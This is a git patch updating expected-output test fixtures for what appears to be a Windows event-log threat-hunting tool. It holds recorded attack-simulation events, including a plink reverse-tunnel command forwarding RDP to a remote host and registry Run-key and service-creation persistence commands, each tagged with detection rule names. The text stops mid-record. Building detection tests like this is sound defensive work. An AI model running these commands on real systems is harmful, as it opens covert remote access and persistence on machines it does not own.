From d42accc3f25eb69a637dcf9b63ce4076d8b77ecd Mon Sep 17 00:00:00 2001 From: dorgja Date: Fri, 7 Jan 2022 14:31:38 +0000 Subject: [PATCH] updating search and hunt test yaml files as they have changed due to the we're now processing the event logs
---
 e2e/hunt_expected.json | 2 +- e2e/search_expected.yml | 1676 +++++++++++++++++---------------------- 2 files changed, 717 insertions(+), 961 deletions(-)
diff --git a/e2e/hunt_expected.json b/e2e/hunt_expected.json
index a6796b3..bd5d4a6 100644
--- a/e2e/hunt_expected.json
+++ b/e2e/hunt_expected.json
@@ -1 +1 @@
-[{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"System":{"Channel":"Security","Computer":"PC01.example.corp","Correlation":null,"EventID":1102,"EventRecordID":227693,"Execution":{"#attributes":{"ProcessID":820,"ThreadID":608}},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"}},"Security":null,"Task":104,"TimeCreated":{"#attributes":{"SystemTime":"2019-02-13T18:01:41.593830Z"}},"Version":0},"UserData":{"LogFileCleared":{"#attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog","xmlns:auto-ns3":"http://schemas.microsoft.com/win/2004/08/events"},"SubjectDomainName":"EXAMPLE","SubjectLogonId":"0xaf855","SubjectUserName":"admin01","SubjectUserSid":"S-1-5-21-1587066498-1489273250-1035260531-1108"}}}}},{"detection":["Exfiltration and Tunneling Tools Execution"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"","NewProcessId":"0xcfc","NewProcessName":"C:\\Users\\user01\\Desktop\\plink.exe","ProcessId":"0xe60","SubjectDomainName":"EXAMPLE","SubjectLogonId":"0x2ed80","SubjectUserName":"user01","SubjectUserSid":"S-1-5-21-1587066498-1489273250-1035260531-1106","TokenElevationType":"%%1936"},"System":{"Channel":"Security","Computer":"PC01.example.corp","Correlation":null,"EventID":4688,"EventRecordID":227714,"Execution":{"#attributes":{"ProcessID":4,"ThreadID":56}},"Keywords":"0x8020000000000000","Level":0,"Opcode":0,"Provider":{"#attributes":{"Guid":"54849625-5478-4994-A5BA-3E3B0328C30D","Name":"Microsoft-Windows-Security-Auditing"}},"Security":null,"Task":13312,"TimeCreated":{"#attributes":{"SystemTime":"2019-02-13T18:03:28.318440Z"}},"Version":1}}}},{"detection":["Exfiltration and Tunneling Tools 
Execution"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"plink.exe 10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127.0.0.2:3389 -l test -pw test","Company":"Simon Tatham","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\","Description":"Command-line SSH, Telnet, and Rlogin client","FileVersion":"Release 0.70","Hashes":"SHA1=7806AD24F669CD8BB9EBE16F87E90173047F8EE4","Image":"C:\\Users\\IEUser\\Desktop\\plink.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-D6AB-5C67-0000-002056660200","LogonId":"0x26656","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-D92A-5C67-0000-0010CB580900","ParentProcessId":3904,"ProcessGuid":"365ABB72-DFAD-5C67-0000-0010E0811500","ProcessId":2312,"Product":"PuTTY suite","RuleName":"","TerminalSessionId":1,"User":"PC01\\IEUser","UtcTime":"2019-02-16 10:02:21.934"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1940899,"Execution":{"#attributes":{"ProcessID":1728,"ThreadID":412}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-02-16T10:02:21.934438Z"}},"Version":5}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-07-19 
14:43:46.619","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ProcessId":3912,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\phvj2yfb\\phvj2yfb.dll","UtcTime":"2019-07-19 14:43:46.619"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":3575,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:43:46.623217Z"}},"Version":2}}}},{"detection":["New Service Creation"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"sc.exe create AtomicTestService binPath= C:\\AtomicRedTeam\\atomics\\T1050\\bin\\AtomicService.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Service Control Manager Configuration Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF","Image":"C:\\Windows\\System32\\sc.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"sc.exe create AtomicTestService binPath= C:\\AtomicRedTeam\\atomics\\T1050\\bin\\AtomicService.exe\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D738-5D31-0000-001046A02600","ParentProcessId":4216,"ProcessGuid":"747F3D96-D738-5D31-0000-001098A22600","ProcessId":1700,"Product":"Microsoft® Windows® Operating 
System","RuleName":"Persistence or Exec - Services Management","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:44:08.181"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3577,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:44:08.185344Z"}},"Version":5}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000003)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-D4A4-5D31-0000-00100F520000","ProcessId":572,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\Start","UtcTime":"2019-07-19 14:44:08.197"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3578,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:44:08.221461Z"}},"Version":2}}}},{"detection":["Registry Entries For Azorult 
Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"C:\\AtomicRedTeam\\atomics\\T1050\\bin\\AtomicService.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-D4A4-5D31-0000-00100F520000","ProcessId":572,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\ImagePath","UtcTime":"2019-07-19 14:44:08.197"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3579,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:44:08.240767Z"}},"Version":2}}}},{"detection":["Stop Windows Service"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"sc.exe stop AtomicTestService","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Service Control Manager Configuration Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF","Image":"C:\\Windows\\System32\\sc.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"sc.exe stop 
AtomicTestService\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D739-5D31-0000-00104CB72600","ParentProcessId":5000,"ProcessGuid":"747F3D96-D739-5D31-0000-0010B6B92600","ProcessId":980,"Product":"Microsoft® Windows® Operating System","RuleName":"Persistence or Exec - Services Management","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:44:09.172"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3584,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:44:09.176040Z"}},"Version":5}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000004)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-D4A4-5D31-0000-00100F520000","ProcessId":572,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\Start","UtcTime":"2019-07-19 14:44:09.291"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3587,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:44:09.310810Z"}},"Version":2}}}},{"detection":["Registry Entries For Azorult 
Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000002)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-D4A4-5D31-0000-00100F520000","ProcessId":572,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\Start","UtcTime":"2019-07-19 14:44:26.166"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3589,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:44:26.222431Z"}},"Version":2}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"C:\\AtomicRedTeam\\atomics\\T1050\\bin\\AtomicService.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-D4A4-5D31-0000-00100F520000","ProcessId":572,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\ImagePath","UtcTime":"2019-07-19 14:44:26.166"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3590,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:44:26.246190Z"}},"Version":2}}}},{"detection":["Registry Entries For 
Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000004)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-D4A4-5D31-0000-00100F520000","ProcessId":572,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\AtomicTestService\\Start","UtcTime":"2019-07-19 14:44:47.416"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3592,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:44:49.679320Z"}},"Version":2}}}},{"detection":["Godmode Sigma Rule","Reg Add RUN Key"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG ADD \" \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V Atomic\" Red \"Team /t REG_SZ /F /D C:\\Path\\AtomicRedTeam.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D765-5D31-0000-001027B72800","ProcessId":6584,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:44:53.201"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3593,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:44:53.219598Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","Direct Autorun Keys Modification","Reg Add RUN Key"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"REG ADD \" \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V Atomic\" Red \"Team /t REG_SZ /F /D C:\\Path\\AtomicRedTeam.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG ADD \" \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V Atomic\" Red \"Team /t REG_SZ /F /D C:\\Path\\AtomicRedTeam.exe\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D765-5D31-0000-001027B72800","ParentProcessId":6584,"ProcessGuid":"747F3D96-D765-5D31-0000-001086B92800","ProcessId":2068,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:44:53.244"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3594,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:44:53.258049Z"}},"Version":5}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"C:\\Path\\AtomicRedTeam.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D765-5D31-0000-001086B92800","ProcessId":2068,"RuleName":"Persistence - via Run key","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Atomic Red Team","UtcTime":"2019-07-19 
14:44:53.261"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3595,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:44:53.292455Z"}},"Version":2}}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG DELETE \" \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V Atomic\" Red \"Team /f\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D765-5D31-0000-0010D7BD2800","ProcessId":5824,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:44:53.314"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3596,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:44:53.330492Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"REG DELETE \" \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V Atomic\" Red \"Team /f","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG DELETE \" \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V Atomic\" Red \"Team /f\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D765-5D31-0000-0010D7BD2800","ParentProcessId":5824,"ProcessGuid":"747F3D96-D765-5D31-0000-001022C02800","ProcessId":2912,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:44:53.337"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3597,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:44:53.349171Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","Reg Add RUN Key"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d \" C:\\Path\\AtomicRedTeam.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D772-5D31-0000-0010BEE52800","ProcessId":3216,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
14:45:06.056"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3600,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3592}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-19T14:45:06.075725Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","Direct Autorun Keys Modification","Reg Add RUN Key"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"REG ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d C:\\Path\\AtomicRedTeam.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d \" C:\\Path\\AtomicRedTeam.dll","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D772-5D31-0000-0010BEE52800","ParentProcessId":3216,"ProcessGuid":"747F3D96-D772-5D31-0000-001010E82800","ProcessId":3772,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 
